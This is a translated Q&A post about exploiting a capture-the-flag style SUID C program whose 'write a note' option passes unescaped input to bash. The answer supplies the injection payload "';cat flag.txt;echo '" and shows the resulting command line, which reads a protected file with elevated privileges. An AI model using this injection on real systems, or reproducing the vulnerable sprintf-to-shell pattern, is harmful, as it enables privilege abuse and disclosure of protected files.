[英]How to shell command inject a file
我有以下 SUID 的 c 程序。
int execute(char *command, char *envp[])
{
pid_t pid;
int status=0;
char *argv[] = {"/bin/bash", "-p", "-c", command, NULL};
if ((pid = fork()) < 0) { /* fork a child process */
printf("*** ERROR: forking child process failed\n");
exit(1);
}
else if (pid == 0) { /* for the child process: */
if (execvpe(*argv, argv, envp) < 0) { /* execute the command */
printf("*** ERROR: exec failed\n");
exit(1);
}
}
else { /* for the parent: */
while (wait(&status) != pid) /* wait for completion */
;
}
return status;
}
int main(int argc, char * argv[], char *envp[])
{
char command[256];
char name[64];
char menu[10];
char notes[128];
char filename[128] = PREFIX;
strcat(filename,"mynotes.txt");
printf("What's your name? ");
fgets(name, 64, stdin);
strtok(name,"\n");
printf("Welcome %s!\n", name);
do {
printf("\nWhat would you like to do? \n");
printf("[1] Check the weather\n");
printf("[2] Write a note\n");
printf("[3] Read my notes\n");
printf("[4] Get the flag\n");
printf("[5] Quit\n");
printf("Enter your choise (1-5): ");
fgets(menu,10,stdin);
switch(menu[0]) {
case '1':
strcpy(command, "/usr/bin/curl wttr.in/?format=4");
execute(command,envp);
break;
case '2':
printf("Please type in your notes (128 characters max.):\n");
fgets(notes, 128, stdin);
sprintf(command, "/bin/echo '%s' >> %s", notes, filename);
execute(command,envp);
break;
case '3':
sprintf(command,"/bin/cat %s", filename);
execute(command,envp);
break;
case '4':
printf("I'm sorry %s, I'm afraid I can't do that.\n", name);
break;
}
}
while(menu[0] != '5');
return 0;
}
我如何通過 shell 命令注入來利用它來顯示同一用戶擁有的另一個文件的內容。 例如,我嘗試過 ./shellwrapper ;cat flag.txt - 但是權限被拒絕,因為 ./shellwrapper 已經完成並且 suid 不再有效。 菜單選擇是否存在漏洞?
選擇選項 2,並輸入以下注釋:
';cat flag.txt;echo '
這是有效的,因為它不會轉義音符輸入,因此當您替換音符時,您會得到
/bin/echo '';cat flag.txt;echo '' >> mynotes.txt
這將由 SUID shell 執行。 它會將flag.txt
輸出到終端,並在mynotes.txt
寫入一個空行。
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.